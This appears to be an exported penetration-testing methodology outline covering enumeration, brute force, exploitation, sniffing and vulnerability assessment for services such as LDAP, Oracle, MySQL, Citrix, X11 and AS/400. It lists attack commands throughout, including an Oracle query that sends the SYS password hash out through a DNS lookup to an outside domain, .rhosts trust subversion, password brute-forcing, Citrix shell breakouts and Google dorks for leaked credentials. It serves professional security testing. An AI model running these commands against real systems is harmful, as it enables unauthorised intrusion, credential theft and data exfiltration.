12.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

12.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

12.14.2. ldap brute force

12.14.2.1. bf_ldap

12.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

12.14.2.2. K0ldS

12.14.2.3. LDAP_Brute.pl

12.14.3. Examine Configuration Files

12.14.3.1. General

12.14.3.1.1. containers.ldif

12.14.3.1.2. ldap.cfg

12.14.3.1.3. ldap.conf

12.14.3.1.4. ldap.xml

12.14.3.1.5. ldap-config.xml

12.14.3.1.6. ldap-realm.xml

12.14.3.1.7. slapd.conf

12.14.3.2. IBM SecureWay V3 server

12.14.3.2.1. V3.sas.oc

12.14.3.3. Microsoft Active Directory server

12.14.3.3.1. msadClassesAttrs.ldif

12.14.3.4. Netscape Directory Server 4

12.14.3.4.1. nsslapd.sas_at.conf

12.14.3.4.2. nsslapd.sas_oc.conf

12.14.3.5. OpenLDAP directory server

12.14.3.5.1. slapd.sas_at.conf

12.14.3.5.2. slapd.sas_oc.conf

12.14.3.6. Sun ONE Directory Server 5.1

12.14.3.6.1. 75sas.ldif

12.15. PPTP/L2TP/VPN port 500/1723 open

12.15.1. Enumeration

12.15.1.1. ike-scan

12.15.1.2. ike-probe

12.15.2. Brute-Force

12.15.2.1. ike-crack

12.15.3. Reference Material

12.15.3.1. PSK cracking paper

12.15.3.2. SecurityFocus Infocus

12.15.3.3. Scanning a VPN Implementation

12.16. Modbus port 502 open

12.16.1. modscan

12.17. rlogin port 513 open

12.17.1. Rlogin Enumeration

12.17.1.1. Find the files

12.17.1.1.1. find / -name .rhosts

12.17.1.1.2. locate .rhosts

12.17.1.2. Examine Files

12.17.1.2.1. cat .rhosts

12.17.1.3. Manual Login

12.17.1.3.1. rlogin hostname -l username

12.17.1.3.2. rlogin <IP>

12.17.1.4. Subvert the files

12.17.1.4.1. echo ++ > .rhosts

12.17.2. Rlogin Brute force

12.17.2.1. Hydra

12.18. rsh port 514 open

12.18.1. Rsh Enumeration

12.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

12.18.2. Rsh Brute Force

12.18.2.1. rsh-grind

12.18.2.2. Hydra

12.18.2.3. medusa

12.19. SQL Server Port 1433 1434 open

12.19.1. SQL Enumeration

12.19.1.1. piggy

12.19.1.2. SQLPing

12.19.1.2.1. sqlping ip_address/hostname

12.19.1.3. SQLPing2

12.19.1.4. SQLPing3

12.19.1.5. SQLpoke

12.19.1.6. SQL Recon

12.19.1.7. SQLver

12.19.2. SQL Brute Force

12.19.2.1. SQLPAT

12.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

12.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

12.19.2.2. SQL Dict

12.19.2.3. SQLAT

12.19.2.4. Hydra

12.19.2.5. SQLlhf

12.19.2.6. ForceSQL

12.20. Citrix port 1494 open

12.20.1. Citrix Enumeration

12.20.1.1. Default Domain

12.20.1.2. Published Applications

12.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

12.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

12.20.2. Citrix Brute Force

12.20.2.1. bforce.js

12.20.2.2. connect.js

12.20.2.3. Citrix Brute-forcer

12.20.2.4. Reference Material

12.20.2.4.1. Hacking Citrix - the legitimate backdoor

12.20.2.4.2. Hacking Citrix - the forceful way

12.21. Oracle Port 1521 Open

12.21.1. Oracle Enumeration

12.21.1.1. oracsec

12.21.1.2. Repscan

12.21.1.3. Sidguess

12.21.1.4. Scuba

12.21.1.5. DNS/HTTP Enumeration

12.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

12.21.1.5.2. Untitled

12.21.1.6. WinSID

12.21.1.7. Oracle default password list

12.21.1.8. TNSVer

12.21.1.8.1. tnsver host [port]

12.21.1.9. TCP Scan

12.21.1.10. Oracle TNSLSNR

12.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

12.21.1.11. TNSCmd

12.21.1.11.1. perl tnscmd.pl -h ip_address

12.21.1.11.2. perl tnscmd.pl version -h ip_address

12.21.1.11.3. perl tnscmd.pl status -h ip_address

12.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

12.21.1.12. LSNrCheck

12.21.1.13. Oracle Security Check (needs credentials)

12.21.1.14. OAT

12.21.1.14.1. sh opwg.sh -s ip_address

12.21.1.14.2. opwg.bat -s ip_address

12.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

12.21.1.15. OScanner

12.21.1.15.1. sh oscanner.sh -s ip_address

12.21.1.15.2. oscanner.exe -s ip_address

12.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

12.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

12.21.1.16. NGS Squirrel for Oracle

12.21.1.17. Service Register

12.21.1.17.1. Service-register.exe ip_address

12.21.1.18. PLSQL Scanner 2008

12.21.2. Oracle Brute Force

12.21.2.1. OAK

12.21.2.1.1. ora-getsid hostname port sid_dictionary_list

12.21.2.1.2. ora-auth-alter-session host port sid username password sql

12.21.2.1.3. ora-brutesid host port start

12.21.2.1.4. ora-pwdbrute host port sid username password-file

12.21.2.1.5. ora-userenum host port sid userlistfile

12.21.2.1.6. ora-ver -e (-f -l -a) host port

12.21.2.2. breakable (Targets Application Server Port)

12.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

12.21.2.3. SQLInjector (Targets Application Server Port)

12.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

12.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

12.21.2.4. Check Password

12.21.2.5. orabf

12.21.2.5.1. orabf [hash]:[username] [options]

12.21.2.6. thc-orakel

12.21.2.6.1. Cracker

12.21.2.6.2. Client

12.21.2.6.3. Crypto

12.21.2.7. DBVisualisor

12.21.2.7.1. Sql scripts from pentest.co.uk

12.21.2.7.2. Manual sql input of previously reported vulnerabilties

12.21.3. Oracle Reference Material

12.21.3.1. Understanding SQL Injection

12.21.3.2. SQL Injection walkthrough

12.21.3.3. SQL Injection by example

12.21.3.4. Advanced SQL Injection in Oracle databases

12.21.3.5. Blind SQL Injection

12.21.3.6. SQL Cheatsheets

12.21.3.6.1. Untitled

12.22. NFS Port 2049 open

12.22.1. NFS Enumeration

12.22.1.1. showmount -e hostname/ip_address

12.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

12.22.2. NFS Brute Force

12.22.2.1. Interact with NFS share and try to add/delete

12.22.2.2. Exploit and Confuse Unix

12.22.3. Examine Configuration Files

12.22.3.1. /etc/exports

12.22.3.2. /etc/lib/nfs/xtab

12.22.4. nmap nse script

12.22.4.1. nfs-showmount

12.23. Compaq/HP Insight Manager Port 2301,2381open

12.23.1. HP Enumeration

12.23.1.1. Authentication Method

12.23.1.1.1. Host OS Authentication

12.23.1.1.2. Default Authentication

12.23.1.2. Wikto

12.23.1.3. Nstealth

12.23.2. HP Bruteforce

12.23.2.1. Hydra

12.23.2.2. Acunetix

12.23.3. Examine Configuration Files

12.23.3.1. path.properties

12.23.3.2. mx.log

12.23.3.3. CLIClientConfig.cfg

12.23.3.4. database.props

12.23.3.5. pg_hba.conf

12.23.3.6. jboss-service.xml

12.23.3.7. .namazurc

12.24. MySQL port 3306 open

12.24.1. Enumeration

12.24.1.1. nmap -A -n -p3306 <IP Address>

12.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

12.24.1.3. telnet IP_Address 3306

12.24.1.4. use test; select * from test;

12.24.1.5. To check for other DB's -- show databases

12.24.2. Administration

12.24.2.1. MySQL Network Scanner

12.24.2.2. MySQL GUI Tools

12.24.2.3. mysqlshow

12.24.2.4. mysqlbinlog

12.24.3. Manual Checks

12.24.3.1. Default usernames and passwords

12.24.3.1.1. username: root password:

12.24.3.1.2. testing

12.24.3.2. Configuration Files

12.24.3.2.1. Operating System

12.24.3.2.2. Command History

12.24.3.2.3. Log Files

12.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

12.24.3.2.5. MySQL data directory (Location specified in my.cnf)

12.24.3.2.6. SSL Check

12.24.3.3. Privilege Escalation

12.24.3.3.1. Current Level of access

12.24.3.3.2. Access passwords

12.24.3.3.3. Create a new user and grant him privileges

12.24.3.3.4. Break into a shell

12.24.4. SQL injection

12.24.4.1. mysql-miner.pl

12.24.4.1.1. mysql-miner.pl http://target/ expected_string database

12.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

12.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

12.24.5. References.

12.24.5.1. Design Weaknesses

12.24.5.1.1. MySQL running as root

12.24.5.1.2. Exposed publicly on Internet

12.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

12.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

12.25. RDesktop port 3389 open

12.25.1. Rdesktop Enumeration

12.25.1.1. Remote Desktop Connection

12.25.2. Rdestop Bruteforce

12.25.2.1. TSGrinder

12.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

12.25.2.2. Tscrack

12.26. Sybase Port 5000+ open

12.26.1. Sybase Enumeration

12.26.1.1. sybase-version ip_address from NGS

12.26.2. Sybase Vulnerability Assessment

12.26.2.1. Use DBVisualiser

12.26.2.1.1. Sybase Security checksheet

12.26.2.1.2. Manual sql input of previously reported vulnerabilties

12.26.2.2. NGS Squirrel for Sybase

12.27. SIP Port 5060 open

12.27.1. SIP Enumeration

12.27.1.1. netcat

12.27.1.1.1. nc IP_Address Port

12.27.1.2. sipflanker

12.27.1.2.1. python sipflanker.py 192.168.1-254

12.27.1.3. Sipscan

12.27.1.4. smap

12.27.1.4.1. smap IP_Address/Subnet_Mask

12.27.1.4.2. smap -o IP_Address/Subnet_Mask

12.27.1.4.3. smap -l IP_Address

12.27.2. SIP Packet Crafting etc.

12.27.2.1. sipsak

12.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

12.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain

12.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

12.27.2.2. siprogue

12.27.3. SIP Vulnerability Scanning/ Brute Force

12.27.3.1. tftp bruteforcer

12.27.3.1.1. Default dictionary file

12.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

12.27.3.2. VoIPaudit

12.27.3.3. SiVuS

12.27.4. Examine Configuration Files

12.27.4.1. SIPDefault.cnf

12.27.4.2. asterisk.conf

12.27.4.3. sip.conf

12.27.4.4. phone.conf

12.27.4.5. sip_notify.conf

12.27.4.6. <Ethernet address>.cfg

12.27.4.7. 000000000000.cfg

12.27.4.8. phone1.cfg

12.27.4.9. sip.cfg etc. etc.

12.28. VNC port 5900^ open

12.28.1. VNC Enumeration

12.28.1.1. Scans

12.28.1.1.1. 5900^ for direct access.5800 for HTTP access.

12.28.2. VNC Brute Force

12.28.2.1. Password Attacks

12.28.2.1.1. Remote

12.28.2.1.2. Local

12.28.3. Exmine Configuration Files

12.28.3.1. .vnc

12.28.3.2. /etc/vnc/config

12.28.3.3. $HOME/.vnc/config

12.28.3.4. /etc/sysconfig/vncservers

12.28.3.5. /etc/vnc.conf

12.29. Tor Port 9001, 9030 open

12.29.1. Tor Node Checker

12.29.1.1. Ip Pages

12.29.1.2. Kewlio.net

12.29.2. nmap NSE script

12.30. Jet Direct 9100 open

12.30.1. hijetta

13. X11 port 6000^ open

13.1. X11 Enumeration

13.1.1. List open windows

13.1.2. Authentication Method

13.1.2.1. Xauth

13.1.2.2. Xhost

13.2. X11 Exploitation

13.2.1. xwd

13.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

13.2.2. Keystrokes

13.2.2.1. Received

13.2.2.2. Transmitted

13.2.3. Screenshots

13.2.4. xhost +

13.3. Examine Configuration Files

13.3.1. /etc/Xn.hosts

13.3.2. /usr/lib/X11/xdm

13.3.2.1. Untitled

13.3.3. /usr/lib/X11/xdm/xsession

13.3.4. /usr/lib/X11/xdm/xsession-remote

13.3.5. /usr/lib/X11/xdm/xsession.0

13.3.6. /usr/lib/X11/xdm/xdm-config

13.3.6.1. DisplayManager*authorize:on

14. inurl:Citrix/AccessPlatform/auth/login.aspx

15. Citrix Specific Testing

15.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

15.2. Enumeration

15.2.1. web search

15.2.1.1. Google (GHDB)

15.2.1.1.1. ext:ica

15.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

15.2.1.1.3. [WFClient] Password= filetype:ica

15.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

15.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

15.2.1.1.6. inurl:/Citrix/Nfuse17/

15.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

15.2.1.2. Google Hacks (Author Discovered)

15.2.1.2.1. filetype:ica Username=

15.2.1.2.2. inurl:/Citrix/AccessPlatform/

15.2.1.2.3. inurl:LogonAgent/Login.asp

15.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

15.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

15.2.1.2.6. inurl:/Citrix/NFuse16

15.2.1.2.7. inurl:/Citrix/NFuse151/

15.2.1.2.8. allintitle:MetaFrame XP Login

15.2.1.2.9. allintitle:MetaFrame Presentation Server Login

15.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

15.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

15.2.1.3. Yahoo

15.2.1.3.1. originurlextension:ica

15.2.2. site search

15.2.2.1. Manual

15.2.2.1.1. review web page for useful information

15.2.2.1.2. review source for web page

15.2.3. generic

15.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

15.2.3.2. amap -bqv ip_address port_no.

15.2.4. citrix specific

15.2.4.1. enum.pl

15.2.4.1.1. perl enum.pl ip_address

15.2.4.2. enum.js

15.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

15.2.4.3. connect.js

15.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

15.2.4.4. Citrix-pa-scan

15.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

15.2.4.5. pabrute.c

15.2.4.5.1. ./pabrute pubapp list app_list ip_address

15.2.5. Default Ports

15.2.5.1. TCP

15.2.5.1.1. Citrix XML Service

15.2.5.1.2. Advanced Management Console

15.2.5.1.3. Citrix SSL Relay

15.2.5.1.4. ICA sessions

15.2.5.1.5. Server to server

15.2.5.1.6. Management Console to server

15.2.5.1.7. Session Reliability (Auto-reconnect)

15.2.5.1.8. License Management Console

15.2.5.1.9. License server

15.2.5.2. UDP

15.2.5.2.1. Clients to ICA browser service

15.2.5.2.2. Server-to-server

15.2.6. nmap nse scripts

15.2.6.1. citrix-enum-apps

15.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

15.2.6.2. citrix-enum-apps-xml

15.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

15.2.6.3. citrix-enum-servers

15.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

15.2.6.4. citrix-enum-servers-xml

15.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

15.2.6.5. citrix-brute-xml

15.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

15.3. Scanning

15.3.1. Nessus

15.3.1.1. Plugins

15.3.1.1.1. CGI abuses

15.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

15.3.1.1.3. Misc.

15.3.1.1.4. Service Detection

15.3.1.1.5. Web Servers

15.3.1.1.6. Windows

15.3.2. Nikto

15.3.2.1. perl nikto.pl -host ip_address -port port_no.

15.3.2.1.1. Untitled

15.4. Exploitation

15.4.1. Alter default .ica files

15.4.1.1. InitialProgram=cmd.exe

15.4.1.2. InitialProgram=explorer.exe

15.4.2. Enumerate and Connect

15.4.2.1. For applications identified by Citrix-pa-scan

15.4.2.1.1. Pas

15.4.2.2. For published applications with a Citrix client when the master browser is non-public.

15.4.2.2.1. Citrix-pa-proxy

15.4.3. Manual Testing

15.4.3.1. Create Batch File (cmd.bat)

15.4.3.1.1. 1

15.4.3.1.2. 2

15.4.3.2. Host Scripting File (cmd.vbs)

15.4.3.2.1. Option Explicit

15.4.3.2.2. Dim objShell

15.4.3.2.3. objShell.Run "%comspec% /k"

15.4.3.2.4. WScript.Quit

15.4.3.2.5. alternative functionality

15.4.3.3. iKat

15.4.3.3.1. Integrated Kiosk Attack Tool

15.4.3.4. AT Command - priviledge escalation

15.4.3.4.1. AT HH:MM /interactive "cmd.exe"

15.4.3.4.2. AT HH:MM /interactive %comspec% /k

15.4.3.4.3. Untitled

15.4.3.5. Keyboard Shortcuts/ Hotkeys

15.4.3.5.1. Ctrl + h – View History

15.4.3.5.2. Ctrl + n – New Browser

15.4.3.5.3. Shift + Left Click – New Browser

15.4.3.5.4. Ctrl + o – Internet Address (browse feature)

15.4.3.5.5. Ctrl + p – Print (to file)

15.4.3.5.6. Right Click (Shift + F10)

15.4.3.5.7. F1 – Jump to URL

15.4.3.5.8. SHIFT+F1: Local Task List

15.4.3.5.9. SHIFT+F2: Toggle Title Bar

15.4.3.5.10. SHIFT+F3: Close Remote Application

15.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

15.4.3.5.12. CTRL+F2: Remote Task List

15.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

15.4.3.5.14. ALT+F2: Cycle through programs

15.4.3.5.15. ALT+PLUS: Alt+TAB

15.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

15.5. Brute Force

15.5.1. bforce.js

15.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

15.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

15.5.1.3. Untitled

15.6. Review Configuration Files

15.6.1. Application server configuration file

15.6.1.1. appsrv.ini

15.6.1.1.1. Location

15.6.1.1.2. World writeable

15.6.1.1.3. Review other files

15.6.1.1.4. Sample file

15.6.2. Program Neighborhood configuration file

15.6.2.1. pn.ini

15.6.2.1.1. Location

15.6.2.1.2. Review other files

15.6.2.1.3. Sample file

15.6.3. Citrix ICA client configuration file

15.6.3.1. wfclient.ini

15.6.3.1.1. Location

15.7. References

15.7.1. Vulnerabilities

15.7.1.1. Art of Hacking

15.7.1.2. Common Vulnerabilities and Exploits (CVE)

15.7.1.2.1. Sample file

15.7.1.2.2. Untitled

15.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

15.7.1.3. OSVDB

15.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

15.7.1.4. Secunia

15.7.1.5. Security-database.com

15.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

15.7.1.6. SecurityFocus

15.7.2. Support

15.7.2.1. Citrix

15.7.2.1.1. Knowledge Base

15.7.2.2. Thinworld

15.7.3. Exploits

15.7.3.1. Milw0rm

15.7.3.1.1. http://www.milw0rm.com/search.php

15.7.3.2. Art of Hacking

15.7.3.2.1. Citrix

15.7.4. Tools Resource

15.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

16. Network Backbone

16.1. Generic Toolset

16.1.1. Wireshark (Formerly Ethereal)

16.1.1.1. Passive Sniffing

16.1.1.1.1. Usernames/Passwords

16.1.1.1.2. Email

16.1.1.1.3. FTP

16.1.1.1.4. HTTP

16.1.1.1.5. HTTPS

16.1.1.1.6. RDP

16.1.1.1.7. VOIP

16.1.1.1.8. Other

16.1.1.2. Filters

16.1.1.2.1. ip.src == ip_address

16.1.1.2.2. ip.dst == ip_address

16.1.1.2.3. tcp.dstport == port_no.

16.1.1.2.4. ! ip.addr == ip_address

16.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

16.1.2. Cain & Abel

16.1.2.1. Active Sniffing

16.1.2.1.1. ARP Cache Poisoning

16.1.2.1.2. DNS Poisoning

16.1.2.1.3. Routing Protocols

16.1.3. Cisco-Torch

16.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

16.1.4. NTP-Fingerprint

16.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

16.1.5. Yersinia

16.1.6. p0f

16.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

16.1.7. Manual Check (Credentials required)

16.1.8. MAC Spoofing

16.1.8.1. mac address changer for windows

16.1.8.2. macchanger

16.1.8.2.1. Random Mac Address:- macchanger -r eth0

16.1.8.3. madmacs

16.1.8.4. smac

16.1.8.5. TMAC

17. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

17.1. Password Attacks

17.1.1. Known Accounts

17.1.1.1. Identified Passwords

17.1.1.2. Unidentified Hashes

17.1.2. Default Accounts

17.1.2.1. Identified Passwords

17.1.2.2. Unidentified Hashes

17.2. Exploits

17.2.1. Successful Exploits

17.2.1.1. Accounts

17.2.1.1.1. Passwords

17.2.1.1.2. Groups

17.2.1.1.3. Other Details

17.2.1.2. Services

17.2.1.3. Backdoor

17.2.1.4. Connectivity

17.2.2. Unsuccessful Exploits

17.2.3. Resources

17.2.3.1. Securiteam

17.2.3.1.1. Exploits are sorted by year and must be downloaded individually

17.2.3.2. SecurityForest

17.2.3.2.1. Updated via CVS after initial install

17.2.3.3. GovernmentSecurity

17.2.3.3.1. Need to create and account to obtain access

17.2.3.4. Red Base Security

17.2.3.4.1. Oracle Exploit site only

17.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

17.2.3.5.1. Wireless Exploit Site

17.2.3.6. PacketStorm Security

17.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

17.2.3.7. SecWatch

17.2.3.7.1. Exploits sorted by year and month, download seperately

17.2.3.8. SecurityFocus

17.2.3.8.1. Exploits must be downloaded individually

17.2.3.9. Metasploit

17.2.3.9.1. Install and regualrly update via svn

17.2.3.10. Milw0rm

17.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

17.3. Tools

17.3.1. Metasploit

17.3.1.1. Free Extra Modules

17.3.1.1.1. local copy

17.3.2. Manual SQL Injection

17.3.2.1. Understanding SQL Injection

17.3.2.2. SQL Injection walkthrough

17.3.2.3. SQL Injection by example

17.3.2.4. Blind SQL Injection

17.3.2.5. Advanced SQL Injection in SQL Server

17.3.2.6. More Advanced SQL Injection

17.3.2.7. Advanced SQL Injection in Oracle databases

17.3.2.8. SQL Cheatsheets

17.3.2.8.1. Untitled

17.3.3. SQL Power Injector

17.3.4. SecurityForest

17.3.5. SPI Dynamics WebInspect

17.3.6. Core Impact

17.3.7. Cisco Global Exploiter

17.3.8. PIXDos

17.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

17.3.9. CANVAS

17.3.10. Inguma

18. Contributors

18.1. Matt Byrne (WirelessDefence.org)

18.1.1. Matt contributed the majority of the Wireless section.

18.2. Arvind Doraiswamy (Paladion.net)

18.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

18.3. Lee Lawson (Dns.co.uk)

18.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

18.4. Nabil OUCHN (Security-database.com)

19. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

19.1. Manual

19.1.1. Patch Levels

19.1.2. Confirmed Vulnerabilities

19.1.2.1. Severe

19.1.2.2. High

19.1.2.3. Medium

19.1.2.4. Low

19.2. Automated

19.2.1. Reports

19.2.2. Vulnerabilities

19.2.2.1. Severe

19.2.2.2. High

19.2.2.3. Medium

19.2.2.4. Low

19.3. Tools

19.3.1. GFI

19.3.2. Nessus (Linux)

19.3.2.1. Nessus (Windows)

19.3.3. NGS Typhon

19.3.4. NGS Squirrel for Oracle

19.3.5. NGS Squirrel for SQL

19.3.6. SARA

19.3.7. MatriXay

19.3.8. BiDiBlah

19.3.9. SSA

19.3.10. Oval Interpreter

19.3.11. Xscan

19.3.12. Security Manager +

19.3.13. Inguma

19.4. Resources

19.4.1. Security Focus

19.4.2. Microsoft Security Bulletin

19.4.3. Common Vulnerabilities and Exploits (CVE)

19.4.4. National Vulnerability Database (NVD)

19.4.5. The Open Source Vulnerability Database (OSVDB)

19.4.5.1. Standalone Database

19.4.5.1.1. Update URL

19.4.6. United States Computer Emergency Response Team (US-CERT)

19.4.7. Computer Emergency Response Team

19.4.8. Mozilla Security Information

19.4.9. SANS

19.4.10. Securiteam

19.4.11. PacketStorm Security

19.4.12. Security Tracker

19.4.13. Secunia

19.4.14. Vulnerabilities.org

19.4.15. ntbugtraq

19.4.16. Wireless Vulnerabilities and Exploits (WVE)

19.5. Blogs

19.5.1. Carnal0wnage

19.5.2. Fsecure Blog

19.5.3. g0ne blog

19.5.4. GNUCitizen

19.5.5. ha.ckers Blog

19.5.6. Jeremiah Grossman Blog

19.5.7. Metasploit

19.5.8. nCircle Blogs

19.5.9. pentest mokney.net

19.5.10. Rational Security

19.5.11. Rational Security

19.5.12. Rise Security

19.5.13. Security Fix Blog

19.5.14. Software Vulnerability Exploitation Blog

19.5.15. Software Vulnerability Exploitation Blog

19.5.16. Taosecurity Blog

20. AS/400 Auditing

20.1. Remote

20.1.1. Information Gathering

20.1.1.1. Nmap using common iSeries (AS/400) services.

20.1.1.1.1. Unsecured services (Port;name;description)

20.1.1.1.2. Secured services (Port;name;description)

20.1.1.2. NetCat (old school technique)

20.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

20.1.1.3. Banners Grabbing

20.1.1.3.1. Telnet

20.1.1.3.2. FTP

20.1.1.3.3. HTTP Banner

20.1.1.3.4. POP3

20.1.1.3.5. SNMP

20.1.1.3.6. SMTP

20.1.2. Users Enumeration

20.1.2.1. Default AS/400 users accounts

20.1.2.2. Error messages

20.1.2.2.1. Telnet Login errors

20.1.2.2.2. POP3 authentication Errors

20.1.2.3. Qsys symbolic link (if ftp is enabled)

20.1.2.3.1. ftp target | quote stat | quote site namefmt 1

20.1.2.3.2. cd /

20.1.2.3.3. quote site listfmt 1

20.1.2.3.4. mkdir temp

20.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

20.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

20.1.2.3.7. dir /temp/qsys/*.usrprf

20.1.2.4. LDAP

20.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

20.1.2.4.2. Tool to browse LDAP

20.1.3. Exploitation

20.1.3.1. CVE References

20.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

20.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

20.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

20.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

20.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

20.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

